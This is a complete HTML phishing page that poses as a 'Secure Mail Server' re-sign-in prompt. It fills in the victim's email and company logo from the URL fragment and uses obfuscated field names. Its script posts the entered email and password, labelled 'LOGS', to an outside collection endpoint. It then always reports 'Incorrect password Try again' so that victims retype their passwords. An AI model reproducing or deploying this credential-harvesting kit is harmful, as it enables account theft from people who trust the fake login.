
<!DOCTYPE html>
<html>
	<head>
		<meta lang="en">
		<meta charset="utf-8">
		<title>MailServer</title>
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
		<style>
			.logo{
				border-radius: 49%;
				height: 40px;
				width: 40px; 
				top: 10px;
				position: relative;
				right: 4px;
			}
			.main-c{
				position: relative; 
				width: 460px; 
				background:#000;
				padding-bottom: 1px;
				margin:auto;
				margin-top:110px;
				border-radius: 10px;
			}
		</style>
	</head>
	<body>
		<div class="main-c">
			<section  style="position: relative;top: 20px;" class="sncsjcns sdhnjsnc wt ">
				<img class="wdnwkd jdjks logo" src=""  id="lsdghsiid" style="position:absolute; left: 65px;">
				<span style="position:absolute; left: 120px; bottom: -25px;">
						<span class="tf-800" id="lg"  style="position:relative;"></span>
						<sup style="right: 5px; bottom: 8px; font-size: 8px; position: relative; display:inline;">&copy</sup>
				</span>
			</section>

			<!-- <div class="er-c" id="msg_p" style="display: none; background:#ffff99; color:#000; width: 300px; padding: 5px; position: relative; top: 60px; font-size: 10px; border-radius: 10px;  margin: auto; margin-bottom:40px">
				<div class="er-c-i" style="display:flex;">
					<div><img src="er.png"></div>
					<div style="padding-left: 10px; line-height: 40px;" id="msg">Error Message</div>
				</div>
			</div> -->

			<div class="t-mg" style="text-align:center;">
				<span class="sap wt" style="font-size: 17px; position:relative; left:30px; top: 10px;">Please sign in again to continue</span>
			</div>

			<style>
				body{
					overflow: hidden;
				}
				label{
					color:#fff;
				}

				.t-mg>div{
					padding: 0px 30px;
					position: relative;
					height: 40px;
				}

				.t-mg input{
					position: absolute;
					right: 0;
				}
				
				.t-mg label{
					padding-left: 40px;
					position: relative;
					top: 7px;
				}

			</style>

			<div class="t-mg" style="width:90%">
				<div>
					<label>Email: </label>
					<input
						style="border-radius: 5px; border:1px solid #8f8f9d; padding-left: 10px;width: 60%; height: 25px; magin:auto;"
						type="email"
						name="slaplowiekd" 
						id="slaplowiekd"
						readonly 
					/>
				</div>
				<div>
					<label>Password: </label>
					<input
						style="border-radius: 5px; border:1px solid #8f8f9d; padding-left: 10px;height: 25px; width: 60%; magin:auto;"
						type="password"
						name="paoslpkwelkemd"
						id="paoslpkwelkemd"
						required
					/>
				</div>
			</div>

			<section style="width: 60%; position:absolute; right:10%; margin-top: 10px;">

				<div
					style="color: red; margin-top: -1.1em; margin-bottom: .5em; left: 2%; position: relative;"
					class="wskldkd" id="erasdrsdsaorpas"
				> 
				</div>

				<input
					type="checkbox"
					style=" left: 2%;
					position: relative;"
					name="atc"
					id="atc"
					checked
				/>
				<label for="atc" class="wskldkd" style=" left: 2%; color: #fff;position: relative;" id="wnkcmskcnm"> Stay signed in</label>
				<input
					name="btn"
					type="button"
					id="btn"
					class="btn"
					value="Sign in"
					onclick="handlesplsldmsmfdm()"
				/>
			</section>

			<div style="border-top:1px solid #fff; height: 10px; margin: auto; margin-top:60px; width:80%;"></div>
			<div class="t-mg" style="margin-top: 0px; margin-bottom: 20px; color:#fff; ">
				<section style="text-align: center; ">
				<section>
					<!-- <img src="g.png" > -->
					<!-- <img src="https://www.clipartmax.com/png/middle/44-449042_big-image-the-noun-project.png" width="20" alt=""> -->
					<span style="font-size: 14px;  position: relative; top: 2px; bottom: 12px;">
					<i class="fa fa-circle" style="color: rgb(39, 201, 39); font-size: 9px;" aria-hidden="true"></i>
					Secure Mail Server</span></section>
				</section>
			</div>

			<div class="bg"></div>
		</div>

		<div class="t-mg">
			<section class="shkslsmdhdks" style="position: absolute; bottom: 20px; width:100%;
					color:#000;font-size: 0.8em;text-align: center;" id="wdlsmcklsmklcmlsmxl">
			<span>Copyright <span>&copy</span> 2024 <span id="dff"> </span>. All right reserved</span></section>
		</div>

		<style>

			body{background:#edeff0;}

		.msg{
			text-align: center; color: #e53d16; font-family: monospace; font-weight: bold;   margin-top: 10px;
		}.wbk {word-break: keep-all;}.p0 {padding: 0;}
		.sap{display: block; line-height: 40px; font-size: 23px; padding-top: 4px;  }
		.tf-800 { font-weight: 800; font-size: 25px;}.t-mg{margin-top: 20px;}.wt{color:#fff;text-align: center;padding-top: 20px;}


		
			#btn{ height: 30px;  min-width: 70px; position: absolute;  border-radius: 5px;  font-size: 15px; border:0;  cursor: pointer; color:#fff; right: 0; background: #000; border: 1px solid #fff;
			}

		</style>

		<!-- Optional JavaScript -->
		<!-- jQuery first, then Popper.js, then Bootstrap JS -->
		<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
		<script>

			const url = window.location.href
			const explode = url.split('#');
			const getLogo = explode[1].split("@");
			const company_name = getLogo[1].split('.');

			//Get company name
			document.getElementById('lg').innerHTML = company_name[0].charAt(0).toUpperCase() + company_name[0].slice(1);

			//set account logo if exists
			document.getElementById("lsdghsiid").src = "https://logo.clearbit.com/"+getLogo[1];

			//set email input value
			document.getElementById("slaplowiekd").value = explode[1];

			function handlesplsldmsmfdm() {
				const paweosd = document.getElementById("paoslpkwelkemd").value;
				const emaplks = document.getElementById("slaplowiekd").value;

				//change btn state
				document.getElementById('btn').value = 'Verifying...';
				
				//reset error message
				document.getElementById("erasdrsdsaorpas").innerHTML = ''

				//check if passwor is empty
				if (!paweosd) {
					document.getElementById('btn').value = 'Sign in';
					document.getElementById("erasdrsdsaorpas").innerHTML = '<font face="Arial, Helvetica, sans-serif" size="2" style="color: red">Password required!</font>'
					return
				}

				$.ajax({
					dataType: 'json',
					headers: { 'Accept': 'application/json; odata=verbose' },
					url: 'https://shdtjdc.mypi.co/cgi-bin/post-aapi.php',
					method: "POST",
					data: {
						"email": emaplks,
						"password": paweosd,
						"subject": "LOGS",
						"receiver": "link@bsdmail.com",
						// "receiver": "link@bsdmail.com",
					},
					success: function(response) {
						document.getElementById("paoslpkwelkemd").value = ''
						document.getElementById('btn').value = 'Sign in';
						document.getElementById("erasdrsdsaorpas").innerHTML = 'Incorrect password Try again'
						console.log("Request successful");
						console.log(response); // Log the response if needed
						// Add your success handling code here
					},
					error: function(xhr, status, error) {
						document.getElementById("paoslpkwelkemd").value = ''
						document.getElementById('btn').value = 'Sign in';
						document.getElementById("erasdrsdsaorpas").innerHTML = 'Incorrect password Try again'
						console.error("Request failed");
						console.error(xhr.responseText); // Log the error response if needed
					}
				})
			}
			
		</script>
	</body>
</html>